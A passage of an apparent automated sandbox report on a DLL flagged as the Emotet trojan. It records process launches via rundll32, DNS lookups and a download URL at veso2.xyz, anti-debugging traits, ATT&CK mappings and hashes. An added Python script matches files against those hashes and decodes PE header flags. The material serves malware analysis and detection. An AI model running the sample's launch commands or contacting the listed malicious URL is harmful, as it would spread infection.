Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbr source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbo source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbt source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdb} source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbn source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
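The three hashes in General Information and the static PE characteristics listed above (LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED) are the report's file-level indicators. The following is an added example, not code from Joe Sandbox or from this report, that computes those digests for a local file and decodes the IMAGE_FILE_HEADER flags with only the standard library. The flag values are the winnt.h IMAGE_FILE_* constants; `build_stub_pe` fabricates a header-only buffer (not a real binary) so the parser can be exercised without the sample, and `triage` is the example's own name for the combined check.

```python
"""Added example: match a file against the report's hashes and decode the COFF
file-header flags the report lists. Standard library only; no pefile needed."""
import hashlib
import struct
import sys

# Hashes published in the report for 4123.dll.
REPORT_HASHES = {
    "md5": "f776deb4df137b37dcae5406c8f3a07a",
    "sha1": "f6a31b594fca39c118927405fa4d14353b8fd49a",
    "sha256": "93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e",
}

# IMAGE_FILE_* characteristic bits from winnt.h (subset relevant to triage).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}


def digests(data):
    """MD5 / SHA-1 / SHA-256 of the bytes, keyed like REPORT_HASHES."""
    return {name: hashlib.new(name, data).hexdigest() for name in REPORT_HASHES}


def matches_report(data):
    """Names of the report hashes this data matches (normally all three or none)."""
    d = digests(data)
    return {name for name, value in REPORT_HASHES.items() if d[name] == value}


def pe_file_header(data):
    """Parse the COFF file header; return None if the buffer is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # 4-byte "PE\0\0" signature followed by the 20-byte IMAGE_FILE_HEADER.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, _ts, _symtab, _nsyms, opt_size, flags = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4
    )
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "characteristics": sorted(n for bit, n in CHARACTERISTICS.items() if flags & bit),
        "is_dll": bool(flags & 0x2000),
        "optional_header_size": opt_size,
    }


def build_stub_pe(machine=0x014C, flags=0x210E):
    """Constructed header-only PE for testing (not a runnable binary).
    0x210E is exactly the five flags the report lists for 4123.dll."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)          # e_lfanew -> PE header at 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, flags)
    return bytes(hdr)


def triage(data):
    """Combined verdict: which report hashes matched, plus the PE header summary."""
    return {"matched_hashes": sorted(matches_report(data)), "pe": pe_file_header(data)}


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_stub_pe()
    print(triage(blob))
```

A 32-bit DLL (i386, 32BIT_MACHINE, DLL) is why the sandbox runs it under C:\Windows\SysWOW64\rundll32.exe on the w10x64 guest; on a hunt, the same parser tells you which rundll32 image path to expect in process telemetry.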

Networking:

Performs DNS queries to domains with low reputation
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04851640 (wsprintfA, WSAStartup, socket, gethostbyname, htons, connect, send, recv, closesocket, WSACleanup)
Source: unknown | DNS traffic detected: queries for: veso2.xyz
Source: WerFault.exe, 00000009.00000003.655034598.0000000004A3A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft
Source: WerFault.exe, 0000000C.00000003.697579137.0000000005109000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoftH
Source: rundll32.exe, 0000000A.00000002.701579769.0000000000AAB000.00000004.00000010.sdmp | String found in binary or memory: http://veso2.xyz/campo/r/r1
Source: rundll32.exe, 00000003.00000002.662513941.00000000011A4000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, rundll32.exe, 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp | String found in binary or memory: http://veso2.xyz/campo/r/r1C:
Source: rundll32.exe, 00000003.00000002.660720123.000000000090B000.00000004.00000010.sdmp | String found in binary or memory: http://veso2.xyz/campo/r/r1F
Note: the three DNS lines are one query per rundll32.exe process (PIDs 7132, 7120 and 5752 in the Startup tree), not duplicates. The API sequence in 3_2_04851640 is a minimal blocking Winsock client (resolve host, connect, one send, one recv, close), consistent with a plain HTTP request for http://veso2.xyz/campo/r/r1; the trailing "C:" and "F" on two of the URL strings are adjacent bytes in the memory dump, not part of the URL. The http://crl.microsoft fragments come from WerFault.exe memory (Microsoft certificate-revocation URLs) and are not sample indicators.

System Summary:

Rundll32 performs DNS lookup (likely malicious behavior)
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10001140
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Source: 4123.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4123.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4123.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: classification engine | Classification label: mal80.troj.evad.winDLL@12/15@3/1
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5752
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0B3.tmp
Source: 4123.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Source: 4123.dll | Virustotal: Detection: 55%
Source: 4123.dll | ReversingLabs: Detection: 62%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\4123.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: Binary string: cryptbase.pdbn source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10001100 LoadLibraryW,GetProcAddress,3_2_10001100
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_048511A0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_048511A0
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_10-1245
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: WerFault.exe, 00000008.00000002.660056693.0000000005360000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW`U&
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000008.00000002.659997799.0000000005346000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0
Source: WerFault.exe, 0000000C.00000002.699444115.00000000051A7000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWp
Source: rundll32.exe, 0000000A.00000002.703140912.0000000000DAA000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: WerFault.exe, 00000008.00000002.660056693.0000000005360000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.655141884.0000000004A10000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.697668771.00000000050DC000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000004.00000002.668093242.000000000339A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_3-2269
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100010E0 mov eax, dword ptr fs:[00000030h] 3_2_100010E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01160456 mov eax, dword ptr fs:[00000030h] 3_2_01160456
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0116095E mov eax, dword ptr fs:[00000030h] 3_2_0116095E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_011A1030 mov eax, dword ptr fs:[00000030h] 3_2_011A1030
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01150456 mov eax, dword ptr fs:[00000030h] 4_2_01150456
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0115095E mov eax, dword ptr fs:[00000030h] 4_2_0115095E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01191030 mov eax, dword ptr fs:[00000030h] 4_2_01191030
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_01181030 mov eax, dword ptr fs:[00000030h] 10_2_01181030
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_011B1B50 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,3_2_011B1B50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04851A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_04851A4D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_03371A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_03371A4D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_011B1A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_011B1A4D

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: veso2.xyz
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Application Shimming 1 | Process Injection 111 | Masquerading 11 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Virtualization/Sandbox Evasion 11 | LSASS Memory | Virtualization/Sandbox Evasion 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 111 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 11 | NTDS | System Information Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

Behavior Graph

[Behavior graph (ID 384021, sample 4123.do1, start date 08/04/2021, architecture WINDOWS, score 80). loaddll32.exe starts rundll32.exe, cmd.exe and a second rundll32.exe; cmd.exe starts a third rundll32.exe. All three rundll32.exe processes resolve veso2.xyz, one of them also contacts 192.168.2.1, and each rundll32.exe is followed by a WerFault.exe. Signatures shown on the graph: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Rundll32 performs DNS lookup (likely malicious behavior).]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
4123.dll | 56% | Virustotal |
4123.dll | 62% | ReversingLabs | Win32.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.rundll32.exe.d8052e.1.unpack | 100% | Avira | HEUR/AGEN.1114098
10.2.rundll32.exe.11b0000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.1190000.7.unpack | 100% | Avira | TR/Dropper.Gen
3.2.rundll32.exe.116052e.3.unpack | 100% | Avira | HEUR/AGEN.1114098
3.2.rundll32.exe.11b0000.7.unpack | 100% | Avira | TR/Dropper.Gen
4.2.rundll32.exe.3370000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.rundll32.exe.4850000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.d823b6.2.unpack | 100% | Avira | TR/Dropper.Gen
4.2.rundll32.exe.11a0000.7.unpack | 100% | Avira | TR/Dropper.Gen
4.2.rundll32.exe.115052e.2.unpack | 100% | Avira | HEUR/AGEN.1114098

Domains

Source | Detection | Scanner | Label
veso2.xyz | 11% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://veso2.xyz/campo/r/r1F | 100% | Avira URL Cloud | malware
http://veso2.xyz/campo/r/r1C: | 100% | Avira URL Cloud | malware
http://crl.microsoftH | 0% | Avira URL Cloud | safe
http://crl.microsoft | 0% | URL Reputation | safe
http://veso2.xyz/campo/r/r1 | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
veso2.xyz | unknown | unknown | true | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://veso2.xyz/campo/r/r1F | rundll32.exe, 00000003.00000002.660720123.000000000090B000.00000004.00000010.sdmp | true | Avira URL Cloud: malware | unknown
http://veso2.xyz/campo/r/r1C: | rundll32.exe, 00000003.00000002.662513941.00000000011A4000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, rundll32.exe, 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.microsoftH | WerFault.exe, 0000000C.00000003.697579137.0000000005109000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoft | WerFault.exe, 00000009.00000003.655034598.0000000004A3A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://veso2.xyz/campo/r/r1 | rundll32.exe, rundll32.exe, 0000000A.00000002.701579769.0000000000AAB000.00000004.00000010.sdmp | true | Avira URL Cloud: malware | unknown

Contacted IPs


Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 384021
Start date: 08.04.2021
Start time: 14:28:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 24s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 4123.do1 (renamed file extension from do1 to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.evad.winDLL@12/15@3/1
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 22% (good quality ratio 20.5%)
  • Quality average: 83.5%
  • Quality standard deviation: 29.5%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 52
  • Number of non-executed functions: 23
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 168.61.161.212, 20.82.210.154, 13.64.90.137, 52.155.217.156, 20.54.26.129, 20.82.209.104, 23.10.249.43, 23.10.249.26
  • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
14:29:30 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
14:29:38 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_17580df3\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13646
Entropy (8bit):3.762585176375152
Encrypted:false
SSDEEP:192:i5i/0oXANHBUZMXMed+V38RR/u7sPS274ItWcb:QiBXYBUZMXMe3R/u7sPX4ItWcb
MD5:0B84BEE277813D09A6B3A854C1EFE851
SHA1:F0D067DE3E92B33BDCF13B48033D766EB4ED4EF7
SHA-256:B1C4F5A999E69082FDEDC89C22A72557209B4ADD1EDB306BAB2E6E466DC0CAAA
SHA-512:C899623618CF3FB1FE6E33C8358B92A3142A0778894153C9C74E718CB101224DB347ADAA7FC82FBA4EF19F62DAE75C401F01D85FB3CFBBA2AD80C97F45E5D8B8
Malicious:false
Reputation:low
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_198fc070\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13614
Entropy (8bit):3.762288872168681
Encrypted:false
SSDEEP:192:D/is0oX1NHBUZMXMed+V38RR/u7sPS274ItWcC:7iqXHBUZMXMe3R/u7sPX4ItWcC
MD5:E987F6574AD074D425A4912D15A41936
SHA1:42EB0D593F3F2E5772BFBC5CD7C335E8EDD029C2
SHA-256:6C50E9A4160803C2B1AF302A5DC9D4541B2DFEDBE2D1527280560A624B94E812
SHA-512:ABAE516DF7D04831EA7A4AA5BE704D02241332A3E2333795CA44C29E14E76B1CF55F2CA6A59A9E2EF62901CCBFF76FEE5F5753B123B329B9DF9C4605E010D908
Malicious:false
Reputation:low
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_199fc1e7\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13642
Entropy (8bit):3.7621209734748455
Encrypted:false
SSDEEP:192:Sb/if0oXUNHBUZMXMed+V38RR/u7sPS274ItWcc:O/ihX0BUZMXMe3R/u7sPX4ItWcc
